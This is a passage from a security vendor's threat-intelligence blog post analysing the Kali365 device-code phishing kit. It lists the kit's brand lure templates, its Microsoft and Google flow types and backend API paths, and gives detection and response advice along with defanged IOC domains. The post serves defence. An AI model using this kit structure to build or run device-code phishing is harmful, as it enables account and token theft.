                                                <td class="wpdt-cell "
                                            data-cell-id="B24"
                    data-col-index="1"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        ms_intune                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C24"
                    data-col-index="2"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Intune                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A25"
                    data-col-index="0"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        24                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B25"
                    data-col-index="1"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        ms_yammer                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C25"
                    data-col-index="2"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        Yammer                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A26"
                    data-col-index="0"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        25                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B26"
                    data-col-index="1"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        ms_loop                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C26"
                    data-col-index="2"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Loop                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A27"
                    data-col-index="0"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        26                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B27"
                    data-col-index="1"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        ms_copilot                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C27"
                    data-col-index="2"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Copilot                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A28"
                    data-col-index="0"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        27                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B28"
                    data-col-index="1"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        ms_todo                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C28"
                    data-col-index="2"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft To Do                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A29"
                    data-col-index="0"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        28                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B29"
                    data-col-index="1"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        ms_onedrive_biz                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C29"
                    data-col-index="2"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        OneDrive for Business                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A30"
                    data-col-index="0"
                    data-row-index="29"
                    style="                    padding:10px;
                    "
                    >
                                        29                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B30"
                    data-col-index="1"
                    data-row-index="29"
                    style="                    padding:10px;
                    "
                    >
                                        ms_sharepoint_news                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C30"
                    data-col-index="2"
                    data-row-index="29"
                    style="                    padding:10px;
                    "
                    >
                                        SharePoint News                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A31"
                    data-col-index="0"
                    data-row-index="30"
                    style="                    padding:10px;
                    "
                    >
                                        30                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B31"
                    data-col-index="1"
                    data-row-index="30"
                    style="                    padding:10px;
                    "
                    >
                                        ms_teams_approval                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C31"
                    data-col-index="2"
                    data-row-index="30"
                    style="                    padding:10px;
                    "
                    >
                                        Teams approval                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A32"
                    data-col-index="0"
                    data-row-index="31"
                    style="                    padding:10px;
                    "
                    >
                                        31                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B32"
                    data-col-index="1"
                    data-row-index="31"
                    style="                    padding:10px;
                    "
                    >
                                        ms_password_reset                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C32"
                    data-col-index="2"
                    data-row-index="31"
                    style="                    padding:10px;
                    "
                    >
                                        Password reset                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A33"
                    data-col-index="0"
                    data-row-index="32"
                    style="                    padding:10px;
                    "
                    >
                                        32                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B33"
                    data-col-index="1"
                    data-row-index="32"
                    style="                    padding:10px;
                    "
                    >
                                        ms_mfa_setup                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C33"
                    data-col-index="2"
                    data-row-index="32"
                    style="                    padding:10px;
                    "
                    >
                                        MFA setup                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A34"
                    data-col-index="0"
                    data-row-index="33"
                    style="                    padding:10px;
                    "
                    >
                                        33                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B34"
                    data-col-index="1"
                    data-row-index="33"
                    style="                    padding:10px;
                    "
                    >
                                        ms_quarantine                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C34"
                    data-col-index="2"
                    data-row-index="33"
                    style="                    padding:10px;
                    "
                    >
                                        Quarantined messages                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A35"
                    data-col-index="0"
                    data-row-index="34"
                    style="                    padding:10px;
                    "
                    >
                                        34                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B35"
                    data-col-index="1"
                    data-row-index="34"
                    style="                    padding:10px;
                    "
                    >
                                        direct                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C35"
                    data-col-index="2"
                    data-row-index="34"
                    style="                    padding:10px;
                    "
                    >
                                        Minimal device-code page                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-352'>
table#wpdtSimpleTable-352{ table-layout: fixed !important; }
table#wpdtSimpleTable-352 td, table.wpdtSimpleTable352 th { white-space: normal !important; }
</style>




<h3 class="wp-block-heading">Explore&nbsp;Kali365&nbsp;Lure&nbsp;Variants&nbsp;in&nbsp;ANY.RUN&nbsp;</h3>



<p class="wp-block-paragraph">The following sandbox sessions show how Kali365 adapts the same phishing infrastructure to different trusted brands. Analysts can compare the rendered pages, inspect browser and network activity, and review the artifacts captured during execution.</p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/f6a200ed-5dfd-43d4-9eae-7ad0117fefac/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check DocuSign-themed lure</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="783" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5.webp" alt="" class="wp-image-22299" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5-300x229.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5-768x587.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5-370x283.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5-270x206.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5-740x566.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_5-80x60.webp 80w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>DocuSign-themed&nbsp;lure&nbsp;analyzed&nbsp;inside&nbsp;ANY.RUN’s&nbsp;sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/2996777a-b489-4aa5-b552-063842398c84/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check OneDrive-themed&nbsp;lure</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="774" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6.webp" alt="" class="wp-image-22300" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6-300x227.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6-768x581.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6-370x280.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6-270x204.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6-740x559.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_6-80x60.webp 80w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>OneDrive-themed&nbsp;lure&nbsp;analyzed&nbsp;inside&nbsp;ANY.RUN’s&nbsp;sandbox</em>&nbsp;</figcaption></figure>
</div>


<p class="wp-block-paragraph">The code also&nbsp;contains&nbsp;a ready-made&nbsp;set of templates&nbsp;that operators&nbsp;can use to&nbsp;switch between&nbsp;different brands&nbsp;and phishing&nbsp;scenarios&nbsp;without rebuilding the underlying infrastructure.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7.webp" alt="" class="wp-image-22302" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7-300x166.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7-768x426.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7-370x205.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7-270x150.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_7-740x410.webp 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>multiple Kali365 lure template builders in web-page source code</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Another&nbsp;important&nbsp;configuration&nbsp;field&nbsp;is&nbsp;flow_type,&nbsp;which&nbsp;determines&nbsp;which&nbsp;Device Code&nbsp;Phishing&nbsp;flow&nbsp;Kali365&nbsp;uses:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-351"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="3"
           data-wpID="351"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        flow_type                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Provider                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Device URL                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Polling API                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        device_code                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        login.microsoftonline.com/common/oauth2/deviceauth                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        /api/status/                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        google                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Google                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        google.com/device                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                                             </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-351'>
table#wpdtSimpleTable-351{ table-layout: fixed !important; }
table#wpdtSimpleTable-351 td, table.wpdtSimpleTable351 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Kali365&nbsp;supports&nbsp;both Microsoft and Google device authorization flows. However,&nbsp;the Microsoft&nbsp;flow is&nbsp;used most&nbsp;frequently&nbsp;by its&nbsp;operators.&nbsp;</p>



<h3 class="wp-block-heading">Device-Code&nbsp;Session Creation Endpoints&nbsp;</h3>



<p class="wp-block-paragraph">Kali365 uses&nbsp;the following endpoints&nbsp;to generate a device-code&nbsp;session and retrieve the corresponding lure configuration:&nbsp;</p>



<ul class="wp-block-list">
<li>/api/generate?lure=&lt;ID&gt;&nbsp;</li>



<li>/api/lure-config/&lt;ID&gt;&nbsp;</li>
</ul>



<h3 class="wp-block-heading">Device-Code Polling Endpoints&nbsp;</h3>



<p class="wp-block-paragraph">The&nbsp;phishkit&nbsp;then uses&nbsp;separate polling endpoints&nbsp;to check the&nbsp;status&nbsp;of Microsoft and Google device-code&nbsp;sessions:&nbsp;</p>



<ul class="wp-block-list">
<li>/api/status/&lt;Number&gt;&nbsp;</li>



<li>/api/google/status/&lt;Number&gt;&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Recommendations&nbsp;for&nbsp;SOC Analysts&nbsp;</h2>



<p class="wp-block-paragraph">Kali365 investigations&nbsp;should go beyond the legitimate Microsoft or Google login page. Analysts&nbsp;need to&nbsp;identify&nbsp;the infrastructure that&nbsp;initiated&nbsp;the device-code flow and confirm whether OAuth tokens&nbsp;were issued or used.&nbsp;</p>



<p class="wp-block-paragraph"><strong>Reconstruct the full phishing flow:</strong> Analyze the original URL in ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>. Use in-browser data investigation to inspect encrypted scripts, redirects, runtime content, and the transition from the lure to the legitimate device login page.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-1024x570.png" alt="" class="wp-image-22230" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-1024x570.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-1536x854.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-2048x1139.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.10.31-740x412.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Kali365 phishing attack flow analyzed inside ANY.RUN&nbsp;sandbox&nbsp;in just 60&nbsp;seconds</em>&nbsp;</figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>Extract Kali365-specific artifacts:</strong> Review the design and flow_type fields, lure IDs, redirect chains, domains, and backend paths such as /api/generate?lure=&lt;ID&gt; and /api/status/&lt;Number&gt;. These patterns may provide stronger detection signals than the Microsoft login page itself.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Give analysts full visibility into the phishing flow. </span><br>
Confirm malicious activity before cloud access expands.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Investigate Phishing Faster </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph"><strong>Investigate related campaign activity:</strong>&nbsp;Pivot on the extracted domains, URLs, IP addresses, and Kali365 detections&nbsp;in ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence&nbsp;Lookup</a>&nbsp;to uncover connected infrastructure,&nbsp;submissions, hosting patterns, and targeting trends.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="550" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-1024x550.png" alt="" class="wp-image-22231" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-1024x550.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-300x161.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-768x413.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-1536x825.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-2048x1100.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-370x199.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-270x145.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.12.19-740x397.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Kali365-related&nbsp;sandbox&nbsp;sessions&nbsp;showcased&nbsp;inside ANY.RUN’s&nbsp;TI&nbsp;Lookup&nbsp;for deeper analysis</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>Strengthen continuous&nbsp;detection:</strong>&nbsp;Use ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence&nbsp;Feeds</a>&nbsp;to deliver fresh malicious&nbsp;domains, URLs, and IP addresses&nbsp;into&nbsp;SIEM,&nbsp;SOAR, and other&nbsp;security tools. This&nbsp;helps&nbsp;teams&nbsp;detect and block related phishing infrastructure beyond the&nbsp;initial&nbsp;investigation.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="454" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-1024x454.png" alt="" class="wp-image-22232" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-1024x454.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-300x133.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-768x341.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-1536x681.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-2048x908.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-370x164.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-270x120.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-20-at-12.15.57-740x328.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Get 100% actionable IOCs&nbsp;right inside your existing&nbsp;SIEM,&nbsp;SOAR and other&nbsp;security tools</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>Correlate with identity telemetry:</strong> Check for device-code authentication, unusual OAuth activity, token issuance, unexpected sign-in locations, and subsequent access to Outlook, SharePoint, OneDrive, Teams, or other cloud resources.</p>



<p class="wp-block-paragraph">A password reset alone may not&nbsp;contain&nbsp;the incident. Analysts&nbsp;should also revoke active&nbsp;sessions&nbsp;and refresh tokens, review OAuth permissions, remove unauthorized application access, and investigate follow-on activity.&nbsp;</p>



<h2 class="wp-block-heading">Recommendations&nbsp;for CISOs&nbsp;and&nbsp;Security Leaders&nbsp;</h2>



<p class="wp-block-paragraph">Kali365&nbsp;shows&nbsp;why phishing risk can no longer be measured only by blocked emails&nbsp;or&nbsp;stolen passwords. Device Code Phishing can turn a legitimate authentication process&nbsp;into unauthorized cloud access, making identity visibility and token response critical parts&nbsp;of the&nbsp;security program.&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Review the&nbsp;business&nbsp;need for device-code authentication:</strong>&nbsp;Restrict or disable the flow where it is&nbsp;not&nbsp;required, and&nbsp;apply conditional access&nbsp;controls&nbsp;to reduce unnecessary exposure.&nbsp;</li>



<li><strong>Expand monitoring beyond passwords&nbsp;and endpoints:</strong>&nbsp;Ensure the&nbsp;SOC can detect unusual OAuth activity, token issuance, new application access, and&nbsp;suspicious&nbsp;use of Microsoft 365 resources.&nbsp;</li>



<li><strong>Prepare for token-based compromise:</strong> Incident response plans should include session revocation, refresh-token invalidation, OAuth consent review, and investigation of mailbox, document, and SaaS activity.</li>



<li><strong>Improve visibility into active phishing infrastructure:</strong> Combine ANY.RUN’s solutions to support investigation, threat hunting, and continuous detection across the security stack.</li>



<li><strong>Measure response readiness:</strong>&nbsp;Track how quickly teams&nbsp;can confirm device-code abuse,&nbsp;identify&nbsp;affected accounts, revoke access, and&nbsp;determine whether attackers&nbsp;reached&nbsp;sensitive cloud resources.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The goal is to stop a single authorization request from developing into business email compromise, data exposure, financial fraud, or wider disruption across the organization.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Make faster, evidence-based security decisions with ANY.RUN.  </span><br>
Limit the cost and scope of phishing and malware incidents. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Security Readiness  </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p class="wp-block-paragraph">Kali365&nbsp;shows&nbsp;how phishing is&nbsp;shifting from password theft to the abuse of legitimate OAuth authentication. By using Microsoft and&nbsp;Google&nbsp;device code flows, attackers&nbsp;can obtain access&nbsp;tokens&nbsp;while much of the activity&nbsp;still appears&nbsp;legitimate.&nbsp;</p>



<p class="wp-block-paragraph">Its&nbsp;multi-brand templates&nbsp;make campaigns&nbsp;easy to adapt and&nbsp;scale across&nbsp;different industries. For US&nbsp;organizations, this&nbsp;increases&nbsp;the risk of account compromise, data exposure, fraud, and delayed response.&nbsp;</p>



<p class="wp-block-paragraph">Security teams&nbsp;need browser-level visibility, connected&nbsp;threat&nbsp;context, and fresh infrastructure data to&nbsp;identify&nbsp;these attacks&nbsp;earlier, confirm token abuse, and&nbsp;contain&nbsp;access&nbsp;before it develops&nbsp;into a wider business&nbsp;incident.&nbsp;</p>



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps organizations investigate threats faster andmake response decisions based on clear behavioral evidence.</p>



<p class="wp-block-paragraph">Its solutions include the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> for enterprise-scale malware and phishing analysis, along with <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> products built on investigationdata from more than 15,000 organizations. This intelligence helps security teams enrich alerts, uncover active threats earlier, and add relevant context to detection, investigation, and response workflows.</p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktocomliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, demonstrating its commitment to strong security controls and customer data protection. For SOCs, MSSPs, and enterprise security teams, the platform helps reduce investigation uncertainty, accelerate triage, and turn threat analysis into actionable findings.</p>



<h2 class="wp-block-heading">Related&nbsp;IOCs&nbsp;</h2>



<ul class="wp-block-list">
<li>bluefoodtruths[.]xyz&nbsp;&nbsp;</li>



<li>flexiscalesystems[.]de&nbsp;&nbsp;</li>



<li>guardedwebsolutions[.]de&nbsp;&nbsp;</li>



<li>proforcstaffing[.]com&nbsp;&nbsp;</li>



<li>reputationboosters[.]de&nbsp;&nbsp;</li>



